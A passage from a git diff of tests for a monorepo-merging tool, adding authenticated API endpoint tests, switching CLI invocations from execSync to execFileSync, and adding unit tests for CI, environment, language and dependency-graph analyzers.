}, 60000); +}); + +// ─── Add Endpoint ─────────────────────────────────────────────────────── + +describe('POST /api/add', () => { + it('returns 400 for missing repo', async () => { + await authPost('/api/add') + .send({ targetMonorepo: '/tmp/mono' }) + .expect(400); + }); + + it('returns 400 for missing targetMonorepo', async () => { + await authPost('/api/add') + .send({ repo: './some-repo' }) + .expect(400); + }); + + it('returns 400 for non-string repo', async () => { + await authPost('/api/add') + .send({ repo: 123, targetMonorepo: '/tmp/mono' }) + .expect(400); + }); + + it('returns 202 with opId for valid input', async () => { + const res = await 
authPost('/api/add') + .send({ repo: './tests/fixtures/repo-a', targetMonorepo: '/tmp/mono-test' }) + .expect(202); + + expect(res.body).toHaveProperty('opId'); + }); +}); + +// ─── Migrate Branch Endpoint ──────────────────────────────────────────── + +describe('POST /api/migrate-branch', () => { + it('returns 400 for missing branch', async () => { + await authPost('/api/migrate-branch') + .send({ sourceRepo: './repo', targetMonorepo: '/tmp/mono' }) + .expect(400); + }); + + it('returns 400 for missing sourceRepo', async () => { + await authPost('/api/migrate-branch') + .send({ branch: 'feature', targetMonorepo: '/tmp/mono' }) + .expect(400); + }); + + it('returns 400 for missing targetMonorepo', async () => { + await authPost('/api/migrate-branch') + .send({ branch: 'feature', sourceRepo: './repo' }) + .expect(400); + }); + + it('returns 202 with opId for valid input', async () => { + const res = await authPost('/api/migrate-branch') + .send({ + branch: 'feature', + sourceRepo: './tests/fixtures/repo-a', + targetMonorepo: '/tmp/mono-test', + }) + .expect(202); + + expect(res.body).toHaveProperty('opId'); + }); }); // ─── Configure Endpoint ───────────────────────────────────────────────── @@ -485,8 +711,7 @@ describe('POST /api/configure', () => { }); it('returns 202 with opId for valid input', async () => { - const res = await request(server) - .post('/api/configure') + const res = await authPost('/api/configure') .send({ packagesDir: 'packages', packageNames: ['app-a'], baseDir: configureTmpDir }) .expect(202); @@ -494,15 +719,13 @@ describe('POST /api/configure', () => { }); it('returns 400 for missing packagesDir', async () => { - await request(server) - .post('/api/configure') + await authPost('/api/configure') .send({ packageNames: ['app-a'] }) .expect(400); }); it('returns 400 for empty packageNames', async () => { - await request(server) - .post('/api/configure') + await authPost('/api/configure') .send({ packagesDir: 'packages', packageNames: [] }) 
.expect(400); }); @@ -516,8 +739,7 @@ describe('POST /api/archive', () => { delete process.env.GITHUB_TOKEN; try { - const res = await request(server) - .post('/api/archive') + const res = await authPost('/api/archive') .send({ repos: ['./repo-a'] }) .expect(400); @@ -528,8 +750,7 @@ describe('POST /api/archive', () => { }); it('returns 400 for missing repos', async () => { - await request(server) - .post('/api/archive') + await authPost('/api/archive') .send({}) .expect(400); }); @@ -539,8 +760,7 @@ describe('POST /api/archive', () => { process.env.GITHUB_TOKEN = 'test-token'; try { - const res = await request(server) - .post('/api/archive') + const res = await authPost('/api/archive') .send({ repos: ['./repo-a'] }) .expect(200); diff --git a/tests/integration/turbo-nx-generation.test.ts b/tests/integration/turbo-nx-generation.test.ts index a187519..c6bbc2b 100644 --- a/tests/integration/turbo-nx-generation.test.ts +++ b/tests/integration/turbo-nx-generation.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync } from 'node:child_process'; import fs from 'fs-extra'; import path from 'node:path'; import os from 'node:os'; @@ -8,6 +8,12 @@ import crypto from 'node:crypto'; // Retry count for flaky tests (temp directory race conditions) const FLAKY_TEST_RETRIES = 2; +const cliPath = path.join(process.cwd(), 'bin', 'monorepo.js'); + +function runMerge(args: string[]): void { + execFileSync('node', [cliPath, 'merge', ...args], { stdio: 'pipe' }); +} + describe('Turbo/Nx Generation Integration', () => { let tempDir: string; let outputDir: string; @@ -56,10 +62,7 @@ describe('Turbo/Nx Generation Integration', () => { const repo1 = await createTestRepo('pkg-a'); const repo2 = await createTestRepo('pkg-b', { lint: 'eslint .' 
}); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} ${repo2} -o ${outputDir} --workspace-tool turbo -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, repo2, '-o', outputDir, '--workspace-tool', 'turbo', '-y', '--no-install']); // Verify turbo.json exists and has correct structure const turboPath = path.join(outputDir, 'turbo.json'); @@ -77,10 +80,7 @@ describe('Turbo/Nx Generation Integration', () => { const repo1 = await createTestRepo('pkg-a'); const repo2 = await createTestRepo('pkg-b'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} ${repo2} -o ${outputDir} --workspace-tool nx -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, repo2, '-o', outputDir, '--workspace-tool', 'nx', '-y', '--no-install']); // Verify nx.json exists and has correct structure const nxPath = path.join(outputDir, 'nx.json'); @@ -96,10 +96,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should add turbo as devDependency in root package.json', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool turbo -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'turbo', '-y', '--no-install']); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); expect(rootPkg.devDependencies?.turbo).toBeDefined(); @@ -108,10 +105,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should add nx as devDependency in root package.json', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool nx -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'nx', '-y', '--no-install']); const rootPkg 
= await fs.readJson(path.join(outputDir, 'package.json')); expect(rootPkg.devDependencies?.nx).toBeDefined(); @@ -120,10 +114,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should update root scripts to use turbo', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool turbo -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'turbo', '-y', '--no-install']); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); expect(rootPkg.scripts?.build).toContain('turbo'); @@ -133,10 +124,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should update root scripts to use nx', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool nx -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'nx', '-y', '--no-install']); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); expect(rootPkg.scripts?.build).toContain('nx'); @@ -146,10 +134,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should not generate config when using --workspace-tool none', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool none -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'none', '-y', '--no-install']); expect(await fs.pathExists(path.join(outputDir, 'turbo.json'))).toBe(false); expect(await fs.pathExists(path.join(outputDir, 'nx.json'))).toBe(false); diff --git a/tests/tsconfig.json b/tests/tsconfig.json new file mode 100644 index 
0000000..813c385 --- /dev/null +++ b/tests/tsconfig.json @@ -0,0 +1,11 @@ +{ + "extends": "../tsconfig.json", + "compilerOptions": { + "rootDir": "..", + "outDir": "../dist-tests", + "noEmit": true, + "noUnusedLocals": false, + "noUnusedParameters": false + }, + "include": ["**/*.ts", "../src/**/*.ts"] +} diff --git a/tests/unit/analyzers/ci.test.ts b/tests/unit/analyzers/ci.test.ts new file mode 100755 index 0000000..63c3faf --- /dev/null +++ b/tests/unit/analyzers/ci.test.ts @@ -0,0 +1,195 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzeCI } from '../../../src/analyzers/ci.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzeCI', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect multiple CI systems', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-gh', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-circle', + packageJson: { name: 'b', version: '1.0.0' }, + directories: ['.circleci'], + files: { '.circleci/config.yml': 'version: 2.1' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'repo-gh' }, { path: repoBPath, name: 'repo-circle' }], + logger, + ); + + const multiCI = findings.find((f) => f.id === 'ci-multiple-systems'); + expect(multiCI).toBeDefined(); + expect(multiCI!.severity).toBe('warn'); + }); + + it('should detect repos without CI', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-with-ci', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-no-ci', + 
packageJson: { name: 'b', version: '1.0.0' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'repo-with-ci' }, { path: repoBPath, name: 'repo-no-ci' }], + logger, + ); + + const missing = findings.find((f) => f.id === 'ci-missing'); + expect(missing).toBeDefined(); + }); + + it('should return empty findings for single repo with no CI', async () => { + const repoPath = await createTempFixture({ + name: 'no-ci-single', + packageJson: { name: 'test', version: '1.0.0' }, + }); + + const findings = await analyzeCI([{ path: repoPath, name: 'no-ci-single' }], logger); + expect(findings).toEqual([]); + }); + + it('should not report missing CI when no repos have CI', async () => { + const repoAPath = await createTempFixture({ + name: 'no-ci-a', + packageJson: { name: 'a', version: '1.0.0' }, + }); + const repoBPath = await createTempFixture({ + name: 'no-ci-b', + packageJson: { name: 'b', version: '1.0.0' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'no-ci-a' }, { path: repoBPath, name: 'no-ci-b' }], + logger, + ); + expect(findings.some((f) => f.id === 'ci-missing')).toBe(false); + }); + + it('should detect workflow name conflicts in GitHub Actions', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-wf-a', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-wf-b', + packageJson: { name: 'b', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'repo-wf-a' }, { path: repoBPath, name: 'repo-wf-b' }], + logger, + ); + + const conflict = findings.find((f) => f.id.startsWith('ci-workflow-conflict')); + expect(conflict).toBeDefined(); + expect(conflict!.title).toContain('ci.yml'); + expect(conflict!.severity).toBe('warn'); 
+ }); + + it('should not flag workflow conflicts when names differ', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-diff-wf-a', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/build.yml': 'name: Build' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-diff-wf-b', + packageJson: { name: 'b', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/test.yml': 'name: Test' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'repo-diff-wf-a' }, { path: repoBPath, name: 'repo-diff-wf-b' }], + logger, + ); + const conflicts = findings.filter((f) => f.id.startsWith('ci-workflow-conflict')); + expect(conflicts).toHaveLength(0); + }); + + it('should detect Travis CI and Jenkins', async () => { + const travisPath = await createTempFixture({ + name: 'repo-travis', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.travis.yml': 'language: node_js' }, + }); + const jenkinsPath = await createTempFixture({ + name: 'repo-jenkins', + packageJson: { name: 'b', version: '1.0.0' }, + files: { 'Jenkinsfile': 'pipeline {}' }, + }); + + const findings = await analyzeCI( + [{ path: travisPath, name: 'repo-travis' }, { path: jenkinsPath, name: 'repo-jenkins' }], + logger, + ); + const multi = findings.find((f) => f.id === 'ci-multiple-systems'); + expect(multi).toBeDefined(); + const systems = multi!.evidence.map((e) => e.snippet); + expect(systems.some((s) => s.includes('Travis CI'))).toBe(true); + expect(systems.some((s) => s.includes('Jenkins'))).toBe(true); + }); + + it('should detect GitLab CI', async () => { + const gitlabPath = await createTempFixture({ + name: 'repo-gitlab', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.gitlab-ci.yml': 'stages:\n - build' }, + }); + const ghPath = await createTempFixture({ + name: 'repo-gh-2', + packageJson: { name: 'b', version: '1.0.0' }, + directories: 
['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + + const findings = await analyzeCI( + [{ path: gitlabPath, name: 'repo-gitlab' }, { path: ghPath, name: 'repo-gh-2' }], + logger, + ); + expect(findings.some((f) => f.id === 'ci-multiple-systems')).toBe(true); + }); + + it('should report ci-missing with correct severity and evidence', async () => { + const ciPath = await createTempFixture({ + name: 'repo-has-ci', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + const noCiPath = await createTempFixture({ + name: 'repo-lacks-ci', + packageJson: { name: 'b', version: '1.0.0' }, + }); + + const findings = await analyzeCI( + [{ path: ciPath, name: 'repo-has-ci' }, { path: noCiPath, name: 'repo-lacks-ci' }], + logger, + ); + const missing = findings.find((f) => f.id === 'ci-missing')!; + expect(missing.severity).toBe('info'); + expect(missing.evidence.some((e) => e.path === 'repo-lacks-ci')).toBe(true); + }); +}); diff --git a/tests/unit/analyzers/dependencies.edge-cases.test.ts b/tests/unit/analyzers/dependencies.edge-cases.test.ts index a5def0a..e8152d6 100644 --- a/tests/unit/analyzers/dependencies.edge-cases.test.ts +++ b/tests/unit/analyzers/dependencies.edge-cases.test.ts @@ -47,21 +47,20 @@ describe('Dependency Analysis Edge Cases', () => { describe('range versions', () => { it('should handle >=x.y.z { const versions = ['>=1.0.0 <2.0.0', '^1.5.0', '1.9.0']; - // Range versions can't be parsed as simple semver const highest = getHighestVersion(versions); - expect(highest).toBeDefined(); + expect(highest).toBe('1.9.0'); }); it('should handle hyphen ranges (1.0.0 - 2.0.0)', () => { const versions = ['1.0.0 - 2.0.0', '1.5.0']; const highest = getHighestVersion(versions); - expect(highest).toBeDefined(); + expect(highest).toBe('1.5.0'); }); it('should handle or ranges (||)', () => { - const versions = ['^1.0.0 || ^2.0.0', '1.5.0']; + const 
versions = ['^1.0.0 || ^2.0.0', '^2.5.0']; const highest = getHighestVersion(versions); - expect(highest).toBeDefined(); + expect(highest).toBe('^2.5.0'); }); }); @@ -193,6 +192,7 @@ describe('Dependency Analysis Edge Cases', () => { // Should gracefully handle malformed JSON expect(result.packages).toHaveLength(0); + expect(result.warnings?.some((w) => w.type === 'parse-error' && w.source === 'malformed')).toBe(true); }); it('should handle wildcard dependencies', async () => { @@ -354,6 +354,99 @@ describe('Dependency Analysis Edge Cases', () => { }); }); + describe('peer conflict and devDependencies paths', () => { + it('should generate decisions for peer dependency violations', async () => { + // Repo with a peerDependency on react >=18 but another repo only has react 17 + const fixture1 = await createTempFixture({ + name: 'peer-host', + packageJson: { + name: 'peer-host', + version: '1.0.0', + dependencies: { react: '^17.0.0' }, + }, + }); + const fixture2 = await createTempFixture({ + name: 'peer-consumer', + packageJson: { + name: 'peer-consumer', + version: '1.0.0', + peerDependencies: { react: '>=18.0.0' }, + }, + }); + + const result = await analyzeDependencies([ + { path: fixture1, name: 'peer-host' }, + { path: fixture2, name: 'peer-consumer' }, + ]); + + // Should have a peer-constraint-violation decision + const peerDecision = result.findings?.decisions.find( + (d) => d.kind === 'peer-constraint-violation', + ); + expect(peerDecision).toBeDefined(); + expect(peerDecision!.description).toContain('react'); + }); + + it('should deduplicate peer conflict with declared conflict of same name', async () => { + // Two repos with different react versions (declared conflict) + peer constraint violation + const fixture1 = await createTempFixture({ + name: 'repo-react-17', + packageJson: { + name: 'repo-react-17', + version: '1.0.0', + dependencies: { react: '^17.0.0' }, + }, + }); + const fixture2 = await createTempFixture({ + name: 'repo-react-18', + 
packageJson: { + name: 'repo-react-18', + version: '1.0.0', + dependencies: { react: '^18.0.0' }, + peerDependencies: { react: '>=18.0.0' }, + }, + }); + + const result = await analyzeDependencies([ + { path: fixture1, name: 'repo-react-17' }, + { path: fixture2, name: 'repo-react-18' }, + ]); + + // Should have both declared and peer conflicts (deduplicated with __peer suffix) + const reactConflicts = result.conflicts.filter((c) => c.name.startsWith('react')); + expect(reactConflicts.length).toBeGreaterThanOrEqual(1); + }); + + it('should resolve devDependencies-only packages to resolvedDevDependencies', async () => { + // One repo with a devDependency, another with same devDependency (no deps version) + const fixture1 = await createTempFixture({ + name: 'dev-repo-1', + packageJson: { + name: 'dev-repo-1', + version: '1.0.0', + devDependencies: { vitest: '^1.0.0' }, + }, + }); + const fixture2 = await createTempFixture({ + name: 'dev-repo-2', + packageJson: { + name: 'dev-repo-2', + version: '1.0.0', + devDependencies: { vitest: '^1.5.0' }, + }, + }); + + const result = await analyzeDependencies([ + { path: fixture1, name: 'dev-repo-1' }, + { path: fixture2, name: 'dev-repo-2' }, + ]); + + // vitest should appear only in resolvedDevDependencies (not in resolvedDependencies) + expect(result.resolvedDevDependencies['vitest']).toBeDefined(); + expect(result.resolvedDependencies['vitest']).toBeUndefined(); + }); + }); + describe('getLowestVersion', () => { it('should return lowest semver version', () => { expect(getLowestVersion(['1.0.0', '2.0.0', '3.0.0'])).toBe('1.0.0'); diff --git a/tests/unit/analyzers/environment.test.ts b/tests/unit/analyzers/environment.test.ts new file mode 100755 index 0000000..184fa7d --- /dev/null +++ b/tests/unit/analyzers/environment.test.ts @@ -0,0 +1,143 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzeEnvironment } from '../../../src/analyzers/environment.js'; +import { createTempFixture, cleanupFixtures } 
from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzeEnvironment', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect Node.js version mismatch', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.nvmrc': '18' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { '.nvmrc': '20' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoAPath, name: 'repo-a' }, { path: repoBPath, name: 'repo-b' }], + logger, + ); + + const mismatch = findings.find((f) => f.id === 'env-node-mismatch'); + expect(mismatch).toBeDefined(); + expect(mismatch!.severity).toBe('warn'); + }); + + it('should flag repos without version files', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-version', + packageJson: { name: 'test', version: '1.0.0' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoPath, name: 'repo-no-version' }], + logger, + ); + + const noVersion = findings.find((f) => f.id.startsWith('env-no-node-version')); + expect(noVersion).toBeDefined(); + }); + + it('should detect .node-version file', async () => { + const repoPath = await createTempFixture({ + name: 'repo-node-version', + packageJson: { name: 'test', version: '1.0.0' }, + files: { '.node-version': '20.11.0' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoPath, name: 'repo-node-version' }], + logger, + ); + + // Should not flag as missing version file + expect(findings.find((f) => f.id.startsWith('env-no-node-version'))).toBeUndefined(); + }); + + it('should detect engines.node in package.json', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-engines-a', + packageJson: { name: 'a', version: '1.0.0', engines: { 
node: '>=18' } }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-engines-b', + packageJson: { name: 'b', version: '1.0.0', engines: { node: '>=20' } }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoAPath, name: 'repo-engines-a' }, { path: repoBPath, name: 'repo-engines-b' }], + logger, + ); + + const mismatch = findings.find((f) => f.id === 'env-node-mismatch'); + expect(mismatch).toBeDefined(); + }); + + it('should handle malformed package.json gracefully', async () => { + const repoPath = await createTempFixture({ + name: 'repo-malformed-env', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoPath, name: 'repo-malformed-env' }], + logger, + ); + + const malformed = findings.find((f) => f.id === 'env-malformed-package-json-repo-malformed-env'); + expect(malformed).toBeDefined(); + expect(malformed?.severity).toBe('warn'); + }); + + it('should detect mismatch between .node-version and .nvmrc across repos', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-nodeversion', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.node-version': '18.17.0' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-nvmrc', + packageJson: { name: 'b', version: '1.0.0' }, + files: { '.nvmrc': '20.10.0' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoAPath, name: 'repo-nodeversion' }, { path: repoBPath, name: 'repo-nvmrc' }], + logger, + ); + + const mismatch = findings.find((f) => f.id === 'env-node-mismatch'); + expect(mismatch).toBeDefined(); + }); + + it('should return no mismatch when all versions match', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.nvmrc': '20' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { '.nvmrc': '20' 
}, + }); + + const findings = await analyzeEnvironment( + [{ path: repoAPath, name: 'repo-a' }, { path: repoBPath, name: 'repo-b' }], + logger, + ); + + expect(findings.find((f) => f.id === 'env-node-mismatch')).toBeUndefined(); + }); +}); diff --git a/tests/unit/analyzers/files.test.ts b/tests/unit/analyzers/files.test.ts index 789a010..603fb5c 100644 --- a/tests/unit/analyzers/files.test.ts +++ b/tests/unit/analyzers/files.test.ts @@ -194,8 +194,8 @@ describe('File Collision Analysis', () => { const result = getFilePaths('config.json', repos, ['repo1', 'repo2']); expect(result).toHaveLength(2); - expect(result[0]).toBe('/path/to/repo1/config.json'); - expect(result[1]).toBe('/path/to/repo2/config.json'); + expect(result[0]).toBe(path.join('/path/to/repo1', 'config.json')); + expect(result[1]).toBe(path.join('/path/to/repo2', 'config.json')); }); it('should filter out non-existent repos', () => { @@ -206,7 +206,7 @@ describe('File Collision Analysis', () => { const result = getFilePaths('config.json', repos, ['repo1', 'nonexistent']); expect(result).toHaveLength(1); - expect(result[0]).toBe('/path/to/repo1/config.json'); + expect(result[0]).toBe(path.join('/path/to/repo1', 'config.json')); }); }); diff --git a/tests/unit/analyzers/graph.test.ts b/tests/unit/analyzers/graph.test.ts index 0a80926..ab47f95 100755 --- a/tests/unit/analyzers/graph.test.ts +++ b/tests/unit/analyzers/graph.test.ts @@ -72,6 +72,22 @@ describe('detectCircularDependencies', () => { const cycles = detectCircularDependencies([]); expect(cycles).toEqual([]); }); + + it('should deduplicate equivalent cycles via canonicalization', () => { + // Cycle: Z→A→M→Z - canonicalization ensures same cycle detected only once + const crossDeps: CrossDependency[] = [ + { fromPackage: 'Z', toPackage: 'A', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + { fromPackage: 'A', toPackage: 'M', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + { fromPackage: 'M', toPackage: 'Z', 
currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + ]; + + const cycles = detectCircularDependencies(crossDeps); + expect(cycles).toHaveLength(1); + // All nodes should be present in the cycle + expect(cycles[0].cycle).toContain('Z'); + expect(cycles[0].cycle).toContain('A'); + expect(cycles[0].cycle).toContain('M'); + }); }); describe('computeHotspots', () => { diff --git a/tests/unit/analyzers/languages.test.ts b/tests/unit/analyzers/languages.test.ts new file mode 100755 index 0000000..4ea5f34 --- /dev/null +++ b/tests/unit/analyzers/languages.test.ts @@ -0,0 +1,208 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { detectLanguages } from '../../../src/analyzers/languages.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; + +describe('detectLanguages', () => { + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect Go via go.mod', async () => { + const repoPath = await createTempFixture({ + name: 'go-repo', + files: { + 'go.mod': 'module github.com/example/mymod\n\ngo 1.21\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'go-repo' }]); + + expect(result).toHaveLength(1); + expect(result[0].repoName).toBe('go-repo'); + expect(result[0].languages).toHaveLength(1); + expect(result[0].languages[0].name).toBe('go'); + expect(result[0].languages[0].markers).toContain('go.mod'); + expect(result[0].languages[0].metadata?.module).toBe('github.com/example/mymod'); + }); + + it('should detect Rust via Cargo.toml', async () => { + const repoPath = await createTempFixture({ + name: 'rust-repo', + files: { + 'Cargo.toml': '[package]\nname = "my-crate"\nversion = "0.1.0"\nedition = "2021"\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'rust-repo' }]); + + expect(result).toHaveLength(1); + expect(result[0].repoName).toBe('rust-repo'); + expect(result[0].languages).toHaveLength(1); + 
expect(result[0].languages[0].name).toBe('rust'); + expect(result[0].languages[0].markers).toContain('Cargo.toml'); + expect(result[0].languages[0].metadata?.crate).toBe('my-crate'); + }); + + it('should detect Python via pyproject.toml', async () => { + const repoPath = await createTempFixture({ + name: 'py-repo', + files: { + 'pyproject.toml': '[project]\nname = "my-python-pkg"\nversion = "1.0.0"\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'py-repo' }]); + + expect(result).toHaveLength(1); + expect(result[0].repoName).toBe('py-repo'); + expect(result[0].languages).toHaveLength(1); + expect(result[0].languages[0].name).toBe('python'); + expect(result[0].languages[0].markers).toContain('pyproject.toml'); + }); + + it('should detect Python via requirements.txt when pyproject.toml is absent', async () => { + const repoPath = await createTempFixture({ + name: 'py-req-repo', + files: { + 'requirements.txt': 'flask==2.3.0\nrequests>=2.28.0\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'py-req-repo' }]); + + expect(result).toHaveLength(1); + expect(result[0].languages[0].name).toBe('python'); + expect(result[0].languages[0].markers).toContain('requirements.txt'); + }); + + it('should prefer pyproject.toml over requirements.txt', async () => { + const repoPath = await createTempFixture({ + name: 'py-both', + files: { + 'pyproject.toml': '[project]\nname = "dual"\n', + 'requirements.txt': 'flask==2.3.0\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'py-both' }]); + + expect(result).toHaveLength(1); + // Should only detect one Python entry, from pyproject.toml + const pyLangs = result[0].languages.filter((l) => l.name === 'python'); + expect(pyLangs).toHaveLength(1); + expect(pyLangs[0].markers).toContain('pyproject.toml'); + }); + + it('should return empty array for JS-only repos', async () => { + const repoPath = await createTempFixture({ + name: 'js-only', + 
packageJson: { name: 'js-only', version: '1.0.0' }, + files: { + 'src/index.ts': 'export const x = 1;\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'js-only' }]); + + expect(result).toHaveLength(0); + }); + + it('should detect multiple languages in one repo', async () => { + const repoPath = await createTempFixture({ + name: 'multi-lang', + files: { + 'go.mod': 'module github.com/example/multi\n\ngo 1.21\n', + 'Cargo.toml': '[package]\nname = "multi"\nversion = "0.1.0"\n', + 'pyproject.toml': '[project]\nname = "multi"\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'multi-lang' }]); + + expect(result).toHaveLength(1); + expect(result[0].languages).toHaveLength(3); + + const langNames = result[0].languages.map((l) => l.name); + expect(langNames).toContain('go'); + expect(langNames).toContain('rust'); + expect(langNames).toContain('python'); + }); + + it('should detect languages across multiple repos', async () => { + const goRepo = await createTempFixture({ + name: 'go-svc', + files: { 'go.mod': 'module github.com/example/svc\n\ngo 1.21\n' }, + }); + const rustRepo = await createTempFixture({ + name: 'rust-lib', + files: { 'Cargo.toml': '[package]\nname = "rust-lib"\nversion = "0.1.0"\n' }, + }); + const jsRepo = await createTempFixture({ + name: 'js-app', + packageJson: { name: 'js-app', version: '1.0.0' }, + }); + + const result = await detectLanguages([ + { path: goRepo, name: 'go-svc' }, + { path: rustRepo, name: 'rust-lib' }, + { path: jsRepo, name: 'js-app' }, + ]); + + // JS-only repo should not appear + expect(result).toHaveLength(2); + expect(result.find((d) => d.repoName === 'go-svc')).toBeDefined(); + expect(result.find((d) => d.repoName === 'rust-lib')).toBeDefined(); + expect(result.find((d) => d.repoName === 'js-app')).toBeUndefined(); + }); + + it('should handle go.mod without module line', async () => { + const repoPath = await createTempFixture({ + name: 'go-no-module', + files: { 
